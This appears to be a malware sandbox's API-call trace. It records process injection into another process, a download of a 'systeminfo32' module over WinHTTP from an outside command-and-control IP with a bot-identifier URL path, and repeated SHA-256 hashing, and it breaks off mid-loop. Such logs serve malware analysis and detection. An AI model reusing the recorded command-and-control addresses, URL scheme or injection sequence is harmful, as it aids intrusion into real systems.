	[0153.937] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x209f78*, nSize=0xd, lpNumberOfBytesWritten=0x128b6c | out: lpBuffer=0x209f78*, lpNumberOfBytesWritten=0x128b6c*=0xd) returned 1
	[0153.937] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.937] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x128ef4*, nSize=0x400, lpNumberOfBytesWritten=0x128b6c | out: lpBuffer=0x128ef4*, lpNumberOfBytesWritten=0x128b6c*=0x400) returned 1
	[0153.938] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x184, flAllocationType=0x3000, flProtect=0x40) returned 0x140000
	[0153.938] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x140000, lpBuffer=0x128cf0*, nSize=0x184, lpNumberOfBytesWritten=0x128b68 | out: lpBuffer=0x128cf0*, lpNumberOfBytesWritten=0x128b68*=0x184) returned 1
	[0153.938] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ad0 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ad0*=0x70) returned 1
	[0153.938] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6228
	[0153.938] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x40) returned 0x150000
	[0153.938] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x150000, lpBuffer=0x22a6228*, nSize=0x28, lpNumberOfBytesWritten=0x128ac8 | out: lpBuffer=0x22a6228*, lpNumberOfBytesWritten=0x128ac8*=0x28) returned 1
	[0153.939] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128af0*, nSize=0x70, lpNumberOfBytesWritten=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesWritten=0x128ac8*=0x70) returned 1
	[0153.939] ResetEvent (hEvent=0x268) returned 1
	[0153.939] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.939] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128af0, nSize=0x70, lpNumberOfBytesRead=0x128ac8 | out: lpBuffer=0x128af0*, lpNumberOfBytesRead=0x128ac8*=0x70) returned 1
	[0153.939] VirtualFreeEx (hProcess=0x454, lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.939] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6228) returned 1
	[0153.939] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x128ef4, nSize=0x400, lpNumberOfBytesRead=0x128b80 | out: lpBuffer=0x128ef4*, lpNumberOfBytesRead=0x128b80*=0x400) returned 1
	[0153.940] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.940] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0153.940] VirtualFreeEx (hProcess=0x454, lpAddress=0x140000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.940] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.940] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.940] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307898) returned 1
	[0153.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad330) returned 1
	[0153.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad360) returned 1
	[0153.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x209f78) returned 1
	[0153.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad348) returned 1
	[0153.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0153.940] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x2283220
	[0153.940] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0153.940] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0153.940] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/10/62/VFRHTKWLZK/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0153.941] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128aec, dwBufferLength=0x4) returned 1
	[0153.941] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0154.245] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0154.245] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128adc, lpdwBufferLength=0x128ad8, lpdwIndex=0x0 | out: lpBuffer=0x128adc*, lpdwBufferLength=0x128ad8*=0x4, lpdwIndex=0x0) returned 1
	[0154.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1
	[0154.246] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff1c8
	[0154.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x22ff1c8, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0154.246] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0154.246] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0154.246] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/63/systeminfo/sTart///", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0154.246] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128ac4, dwBufferLength=0x4) returned 1
	[0154.246] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0154.555] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0154.555] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128ab4, lpdwBufferLength=0x128ab0, lpdwIndex=0x0 | out: lpBuffer=0x128ab4*, lpdwBufferLength=0x128ab0*=0x4, lpdwIndex=0x0) returned 1
	[0154.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff1c8) returned 1
	[0154.555] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22a5bd0, Size=0x40) returned 0x2282848
	[0154.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2283220) returned 1
	[0154.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x2283220
	[0154.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c2f8
	[0154.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ee0) returned 1
	[0154.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad318) returned 1
	[0154.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a79a8) returned 1
	[0154.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f18) returned 1
	[0154.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307870) returned 1
	[0154.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f50) returned 1
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5f50
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad318
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22a79a8
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6db0
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6df8
	[0154.556] StrStrIW (lpFirst="systeminfo GetSystemInfo", lpSrch=" ") returned=" GetSystemInfo"
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad390
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0154.556] lstrcpynW (in: lpString1=0x23078c0, lpString2="systeminfo GetSystemInfo", iMaxLength=11 | out: lpString1="systeminfo") returned="systeminfo"
	[0154.556] StrStrIW (lpFirst="GetSystemInfo", lpSrch=" ") returned 0x0
	[0154.556] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad390, Size=0x10) returned 0x22ad000
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307898
	[0154.556] lstrcpynW (in: lpString1=0x2307898, lpString2="GetSystemInfo", iMaxLength=14 | out: lpString1="GetSystemInfo") returned="GetSystemInfo"
	[0154.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetSystemInfo", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad390
	[0154.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetSystemInfo", cchWideChar=-1, lpMultiByteStr=0x22ad390, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetSystemInfo", lpUsedDefaultChar=0x0) returned 14
	[0154.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307960
	[0154.556] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307960) returned 1
	[0154.557] lstrcmpiW (lpString1="GetSystemInfo", lpString2="start") returned -1
	[0154.557] lstrcmpiW (lpString1="GetSystemInfo", lpString2="release") returned -1
	[0154.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307960
	[0154.557] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307960) returned 1
	[0154.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307960
	[0154.557] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4dc0
	[0154.557] WinHttpConnect (hSession=0x22c4dc0, pswzServerName="5.188.108.22", nServerPort=0x1bf, dwReserved=0x0) returned 0x22c4ea8
	[0154.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23065c8
	[0154.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7038
	[0154.558] WinHttpSetTimeouts (hInternet=0x22c4dc0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0154.558] WinHttpOpenRequest (hConnect=0x22c4ea8, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x22bb5e0
	[0154.558] WinHttpSetOption (hInternet=0x22bb5e0, dwOption=0x1f, lpBuffer=0x128240, dwBufferLength=0x4) returned 1
	[0154.558] WinHttpSendRequest (hRequest=0x22bb5e0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0154.793] WinHttpReceiveResponse (hRequest=0x22bb5e0, lpReserved=0x0) returned 1
	[0154.793] WinHttpQueryHeaders (in: hRequest=0x22bb5e0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128230, lpdwBufferLength=0x12822c, lpdwIndex=0x0 | out: lpBuffer=0x128230*, lpdwBufferLength=0x12822c*=0x4, lpdwIndex=0x0) returned 1
	[0154.794] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0xee5) returned 1
	[0154.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xef0) returned 0x22e9f58
	[0154.794] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x22e9f58, dwNumberOfBytesToRead=0xee5, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x22e9f58*, lpdwNumberOfBytesRead=0x12822c*=0xee5) returned 1
	[0154.794] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0154.794] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22e9f58, Size=0x2ef0) returned 0x272c4c8
	[0154.794] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x272d3ad, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x272d3ad*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0154.794] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x101c) returned 1
	[0154.795] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x272c4c8, Size=0x3f10) returned 0x272c4c8
	[0154.795] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x272f3ad, dwNumberOfBytesToRead=0x101c, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x272f3ad*, lpdwNumberOfBytesRead=0x12822c*=0x101c) returned 1
	[0154.795] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x1af) returned 1
	[0154.795] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x272c4c8, Size=0x40b0) returned 0x272c4c8
	[0154.795] WinHttpReadData (in: hRequest=0x22bb5e0, lpBuffer=0x27303c9, dwNumberOfBytesToRead=0x1af, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x27303c9*, lpdwNumberOfBytesRead=0x12822c*=0x1af) returned 1
	[0154.795] WinHttpQueryDataAvailable (in: hRequest=0x22bb5e0, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x0) returned 1
	[0154.796] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22ac150
	[0154.796] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2731588
	[0154.796] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.797] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.797] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0154.797] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.797] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306550
	[0154.797] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306550, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306550, pdwDataLen=0x128aac) returned 1
	[0154.797] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.797] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.797] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.798] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.798] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0154.798] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306640
	[0154.798] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306640, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306640, pdwDataLen=0x128aac) returned 1
	[0154.798] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.798] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.798] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.799] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.799] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0154.799] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.799] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306668
	[0154.799] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306668, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306668, pdwDataLen=0x128aac) returned 1
	[0154.799] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.799] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.799] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.800] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.800] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0154.800] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306690
	[0154.800] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306690, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306690, pdwDataLen=0x128aac) returned 1
	[0154.800] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.800] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.800] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.800] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.800] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0154.800] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23066b8
	[0154.800] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23066b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23066b8, pdwDataLen=0x128aac) returned 1
	[0154.800] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.800] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.800] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.801] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.801] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0154.801] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.801] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23066e0
	[0154.801] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23066e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23066e0, pdwDataLen=0x128aac) returned 1
	[0154.801] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.801] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.801] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.802] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.802] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0154.802] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.802] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306708
	[0154.802] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306708, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306708, pdwDataLen=0x128aac) returned 1
	[0154.802] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.802] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.802] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.803] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.803] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0154.803] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306730
	[0154.803] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306730, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306730, pdwDataLen=0x128aac) returned 1
	[0154.803] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.803] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.803] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.803] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.803] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0154.803] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306758
	[0154.804] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306758, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306758, pdwDataLen=0x128aac) returned 1
	[0154.804] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.804] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.804] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.804] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.804] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0154.804] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.804] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306780
	[0154.804] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306780, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306780, pdwDataLen=0x128aac) returned 1
	[0154.804] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.804] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.804] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.805] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.805] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0154.805] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.805] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23067a8
